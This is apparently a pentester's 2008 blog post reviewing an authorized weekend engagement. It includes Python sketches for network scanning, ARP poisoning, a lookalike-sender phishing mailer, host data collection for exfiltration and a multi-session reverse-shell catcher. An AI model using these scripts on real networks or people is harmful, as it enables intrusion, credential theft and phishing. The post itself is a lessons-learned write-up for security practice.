Saturday, October 18, 2008

A Successful Pentest with some Failures.

I'm busy preparing for a [de]briefing following a pentest that Eric and I completed a few weeks ago and was thinking about some of the challenges we faced on this particular engagement. Overall the engagement was VERY successful. We owned the client's infrastructure pretty much completely. This post is not so much about where we succeeded as it is about where we failed or could have improved our processes.

The one element that made this engagement different from most was the limited [really limited!] amount of time we had to complete all aspects of the engagement. 50 hours! This might seem like a reasonable amount of time, but when you consider that it included the remote, local [internal], phishing and reporting portions, it's a truly limited amount of time.

After getting all the contracts and authorization AKA 'Cover Your Ass' agreements signed, we were finally able to proceed with the actual work. The scope itself placed some severe limitations on us but at the same time was very broad in what areas we could target. A contradiction, I know. The scope, aside from limiting the amount of active time we had to do the work, also limited us to specific days on which we could actually perform any testing. The remote portion started on a Friday night, the internal portion could begin on the Saturday, and both had a hard stop of 8pm on Sunday night.

This, while not ideal, did provide us with time to do the work. The remote portion of the engagement went pretty fast. The client had a reasonably small internet footprint and numerous sites and devices were out of scope. The internal portion, though, started off badly with the scope changing drastically. I HATE scope creep!

It turns out that the client was undergoing a large infrastructure and server migration. The address ranges we were provided were now invalid. No problem right? Just get the two new /24 ranges. But noooo, the client had changed the entire subnetting scheme and now we had servers across about 6 or so subnets. Our scanning and fingerprinting time just increased a helluva lot. Trying to explain to the client that this was now out of scope was like getting blood from a stone. Rather than postponing the pentest for an indefinite amount of time while waiting for another window to perform the work, we decided to focus on only specific subnets and locations, again limiting the scope. Even so, one of the things that became obvious was that rather than having the time to scan, enumerate and fingerprint the network and get a solid picture of how it operates and how devices interact, I would have to be looking at potential ingress points while the scanning was going on. Not ideal but doable.

One thing I realized is that I'm going to need to keep more than one cheat sheet of scanning arguments for this type of situation in the future. By limiting your scan time you limit what you can scan for, and rather than taking scan results, reviewing them and then targeting and focusing on a single host, you need to decide which hosts have the greatest potential for success and leave the others aside. This means you will miss things that may impact the success of the engagement.
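
For what it's worth, the kind of cheat-sheet entry I mean is nothing fancy. Something like the following sketch (a Python wrapper around nmap, with made-up subnets) is enough to get a quick, time-boxed pass over each range while the fuller scans are still running:

    # quick_triage.py - a rough sketch, not the exact script from the engagement.
    # Runs a fast nmap pass over a list of subnets so target selection can start
    # while the more thorough scans are still going.
    import subprocess

    # Hypothetical subnet list - substitute the in-scope ranges.
    subnets = ["10.1.10.0/24", "10.1.20.0/24", "10.1.30.0/24"]

    for net in subnets:
        prefix = "triage_" + net.replace("/", "_").replace(".", "-")
        # -F limits the scan to the most common ports, -n skips DNS lookups,
        # -T4 speeds up timing, -oA writes nmap/gnmap/xml output for later review.
        subprocess.call(["nmap", "-sS", "-T4", "-F", "-n", "-oA", prefix, net])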

Anyway, after enumerating workstations and servers via SMB and DCERPC scans I had an initial list of targets I wanted to focus on. While all this was going on I was also looking for a lot of the usual misconfigurations on the network such as unauthorized shares, default SNMP community strings, insecure printers, workstations running the server service, etc... I found them all btw. ;)
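
The SNMP one in particular is cheap to check in bulk. A minimal sketch of the idea, assuming the net-snmp command-line tools are installed and using made-up hosts and the usual default strings:

    # snmp_default_check.py - a minimal sketch, assuming the net-snmp tools exist
    # on the scanning box. Tries the common default community strings against a
    # list of hosts by asking for sysDescr (1.3.6.1.2.1.1.1.0).
    import subprocess

    hosts = ["10.1.10.5", "10.1.10.6"]        # hypothetical targets
    communities = ["public", "private"]       # the usual suspects

    for host in hosts:
        for community in communities:
            # -t 1 -r 0 keeps the timeout short so a dead host doesn't stall us.
            rc = subprocess.call(
                ["snmpget", "-v1", "-c", community, "-t", "1", "-r", "0",
                 host, "1.3.6.1.2.1.1.1.0"],
                stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
            if rc == 0:
                print(f"{host} answers to community '{community}'")
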
So after bypassing the proxy, exfiltrating some data, and getting access to the SAN, I needed to focus on the servers and workstations. What I realized was that I needed to better script some of the things I normally do. Running nessus from the command line is great. It's easy to script and cycle through some specific addys. I also realized I needed a few more custom scans that looked for specific vulnerabilities I might be able to leverage.
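
As a rough illustration of the kind of cycling I mean, something like the sketch below would do it. The batch-mode syntax (nessus -q server port user pass targets results) is from memory, so treat it as an assumption and check it against your client version; the hosts, port and credentials are placeholders:

    # nessus_batch.py - a rough sketch of cycling the command-line Nessus client
    # over addresses one at a time. Verify the batch-mode arguments against your
    # version before relying on this.
    import subprocess

    targets = ["10.1.10.5", "10.1.10.6", "10.1.20.12"]   # hypothetical hosts

    for t in targets:
        # One target per run so each host gets its own results file.
        with open("targets.txt", "w") as f:
            f.write(t + "\n")
        result = "nessus_" + t.replace(".", "-") + ".nbe"
        subprocess.call(["nessus", "-q", "127.0.0.1", "1241",
                         "scanuser", "scanpass", "targets.txt", result])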

I did end up getting direct access on about 3 or 4 servers through various means. Being very focused on what I was looking for, and basing those searches on my initial analysis of their environment, paid off. Luckily. It could have gone the other way and that would have, well, sucked. I managed to leverage some of those servers to get a little deeper into the network as well. The limitation on time meant that I could not use those boxes to pivot much deeper into the network; I simply checked for dual-homed servers and scanned those subnets. The report covered the potential for further exploitation and access. Thankfully I'd already written scripts that, when run, would upload my scan utility, run it based on the ipconfig data, and download the results to my host.
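
The dual-homed check itself is simple enough to sketch. Something like the following (not the actual script, and the filtering is deliberately crude) pulls the IPv4 addresses out of the ipconfig output and turns them into candidate /24s to point the scanner at:

    # dualhome_check.py - a minimal sketch of the idea: parse "ipconfig" on a
    # compromised Windows host and list the /24s it touches.
    import re
    import subprocess

    output = subprocess.run(["ipconfig"], capture_output=True, text=True).stdout
    addrs = re.findall(r"\b(\d{1,3}(?:\.\d{1,3}){3})\b", output)

    # Collapse to candidate /24s, skipping loopback, masks and obvious noise.
    subnets = sorted({a.rsplit(".", 1)[0] + ".0/24"
                      for a in addrs if not a.startswith(("127.", "255.", "0."))})
    for net in subnets:
        print(net)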

Another issue was that, because this took place over the weekend, the office was dead quiet. With no port-level security in place, man-in-the-middle attacks are usually pretty trivial and a great way to spoof DNS, steal tokens and passwords, intercept RDP sessions, etc... Well, with no user traffic on the wire, that sucked. The VoIP network segment was a little easier as we could create the voice traffic ourselves. It's always fun when you can intercept and replay the voice traffic.
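
For reference, the ARP-poisoning piece of a MITM setup is only a few lines. The sketch below uses scapy purely for illustration (it's not necessarily what we ran, and a real MITM also needs the gateway poisoned in the other direction plus IP forwarding enabled); the addresses are made up:

    # arp_poison.py - a bare-bones sketch of one-directional ARP poisoning with
    # scapy, just to show the shape of it. Needs root, and is one half of a MITM.
    from scapy.all import ARP, send

    victim_ip  = "10.1.10.50"     # hypothetical workstation
    gateway_ip = "10.1.10.1"      # hypothetical default gateway

    # Tell the victim the gateway's IP lives at our MAC (scapy fills hwsrc with
    # our own interface MAC). Repeat every couple of seconds so the poisoned
    # entry doesn't age out.
    poison = ARP(op=2, psrc=gateway_ip, pdst=victim_ip)
    send(poison, inter=2, loop=1)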

The big issue with the internal portion, aside from managing changes in the scope, was that with limited time you really need to know what your ultimate target is and be able to make a decision on the path to take to achieve that goal. Do you target the servers directly? Do you go in via a workstation, or do you attack the channels between these devices?

Obviously there are other routes to take, but the point is that you need to be sure your direction is the right one, or be able to change vectors quickly once you realize that the vector you're using is not working.

The phishing portion of the engagement, while incredibly successful, also highlighted the issue of limited time while trying to gain as much information as possible. I've developed a series of scripts that I use in my phishing attacks to harvest, format and send emails, and to serve up webpages with code to drop a file, steal credentials and gather user information [both automatically and by enticing the user to enter credentials]. These scripts have served me well even though they need to be customized for each client.
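
The mail-out piece is the least interesting of those scripts, but to give an idea of the shape of it, here's a stripped-down sketch. The relay, sender, template and target file are all placeholders, not anything from this engagement:

    # send_phish.py - a stripped-down sketch of the mail-out piece: read a list
    # of harvested addresses, drop each name into a template, and send.
    import smtplib
    from email.mime.text import MIMEText

    SMTP_SERVER = "mail.example.com"      # hypothetical relay
    FROM_ADDR   = "helpdesk@example.com"  # lookalike sender

    template = ("Hi {name},\n\n"
                "Please review the updated policy document here:\n"
                "http://intranet.example.com/policy.pdf\n")

    with open("targets.csv") as f:        # lines like: name,email
        targets = [line.strip().split(",") for line in f if line.strip()]

    server = smtplib.SMTP(SMTP_SERVER)
    for name, addr in targets:
        msg = MIMEText(template.format(name=name))
        msg["Subject"] = "Updated policy document"
        msg["From"] = FROM_ADDR
        msg["To"] = addr
        server.sendmail(FROM_ADDR, [addr], msg.as_string())
    server.quit()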

We made the decision that we would not have time to leverage any access we gained from the phish and so we wanted to gather as much data as possible from the target host before moving on to the next one. I have a series of scripts that will gather local data such as users, groups, domain, routes, browser history, etc, etc... I also have a script that takes screenshots of the remote host and downloads them to my system. [I love this script!] All the scripts work very well and save me a lot of time but one of the things I realized was that a phish can be too successful. :)
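
The local-data script boils down to running a fixed list of commands on the compromised host and saving the output somewhere you can pull it back from. A minimal sketch, with an illustrative command list:

    # gather_local.py - a minimal sketch of the one-shot local collection idea:
    # run a set of Windows enumeration commands and write each one's output to
    # a file ready for exfil. Command list is illustrative, not exhaustive.
    import subprocess

    commands = {
        "users.txt":    ["net", "user"],
        "admins.txt":   ["net", "localgroup", "administrators"],
        "ipconfig.txt": ["ipconfig", "/all"],
        "routes.txt":   ["route", "print"],
        "netstat.txt":  ["netstat", "-ano"],
    }

    for outfile, cmd in commands.items():
        with open(outfile, "w") as f:
            subprocess.call(cmd, stdout=f, stderr=subprocess.STDOUT)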

We had so many shells come through that, even with splitting them between Eric and myself, we still missed some and were not able to gather all the data from everyone the way we wanted. I'm putting together a script that will call most of the other scripts when it runs, so that I can run it once, gather the data and move on. Our current process is far more efficient than manually gathering that data, but it still takes more time than I like in situations like this.
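
The wrapper itself doesn't need to be clever. Something along these lines, with hypothetical script names standing in for the real ones, is all I'm after:

    # run_all.py - the "run once and move on" wrapper: call each collection
    # script in turn so a single command kicks off everything.
    import subprocess
    import sys

    scripts = ["gather_local.py", "grab_history.py", "screenshot.py"]  # stand-ins

    for script in scripts:
        print(f"[*] running {script}")
        rc = subprocess.call([sys.executable, script])
        if rc != 0:
            print(f"[!] {script} exited with {rc}, carrying on")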

The ability to revise the payload mid-phish was also something we had to do and, while we managed, it could have been done far more efficiently. I should have prepared the alternate payloads beforehand to account for this eventuality. Changing the payload on the webserver was as simple as replacing the existing one and modifying the headers in the page. The email was a little more difficult though. I needed to stop the existing smtp script, modify the payload and restart it with only the remaining emails being targeted. I then needed to generate a new phish email, containing the new payload and a new message, to entice the users that had already been targeted. All this while trying to handle the existing shells. While it only takes one user to click on the link or attachment for a phish to be successful, this phish was about gathering as much data from as many users as possible.
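
The fix is mostly bookkeeping: log each address as it's mailed, so a restarted sender with a revised payload only hits the addresses that haven't been touched yet. A sketch of that piece, building on the mail-out sketch earlier (file names are placeholders):

    # resume_phish.py - a sketch of the resume logic: track sent addresses in a
    # log so a restart with a new payload skips everyone already targeted.
    import os

    SENT_LOG = "sent.log"

    def already_sent():
        if not os.path.exists(SENT_LOG):
            return set()
        with open(SENT_LOG) as f:
            return {line.strip() for line in f}

    def mark_sent(addr):
        with open(SENT_LOG, "a") as f:
            f.write(addr + "\n")

    # In the send loop:
    #   if addr in already_sent(): continue
    #   ... send the (possibly revised) phish ...
    #   mark_sent(addr)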

I don't think our phish would have been half as successful if it had not been for mc and his ninja-like skills in modifying a pdf exploit to run as a Metasploit module, allowing us to use all the payloads in the framework. Awesome stuff.

Our ability to handle multiple payloads connecting back to our servers could also be improved. I actually lost about 5 shells because I could not establish a new session fast enough. Also, rather than having to run a script manually on the target, it would be more efficient to have the payload execute a series of commands as soon as it runs, without requiring any interaction at all.
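
To show the shape of what I mean, here's a bare-bones threaded catcher for plain TCP reverse shells that fires a fixed command list at each connection as it arrives. It is emphatically not the Metasploit handler we actually used on the engagement, just an illustration of "many callbacks, no interaction":

    # multi_catcher.py - a bare-bones sketch: accept many reverse-shell callbacks
    # at once, run a fixed command list against each, and save the output.
    import socketserver

    COMMANDS = [b"whoami\n", b"ipconfig /all\n", b"net user\n"]

    class ShellHandler(socketserver.BaseRequestHandler):
        def handle(self):
            host, port = self.client_address
            self.request.settimeout(5)
            with open(f"loot_{host}_{port}.txt", "wb") as loot:
                for cmd in COMMANDS:
                    self.request.sendall(cmd)
                    try:
                        loot.write(self.request.recv(65536))
                    except OSError:
                        break

    if __name__ == "__main__":
        # ThreadingTCPServer gives each incoming shell its own thread, so a burst
        # of callbacks doesn't mean lost sessions while one is being serviced.
        with socketserver.ThreadingTCPServer(("0.0.0.0", 4444), ShellHandler) as srv:
            srv.serve_forever()
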
When all was said and done the pentest was actually very successful and we achieved all our goals, even with the hiccups we had along the way. It's always a good feeling when an engagement goes well, especially in an environment like this one.

It's important to regularly review the processes and methods you use during an engagement to see if they can be improved or made more efficient. Small things can make a huge difference to the success of a project.

Cheers,
/dean
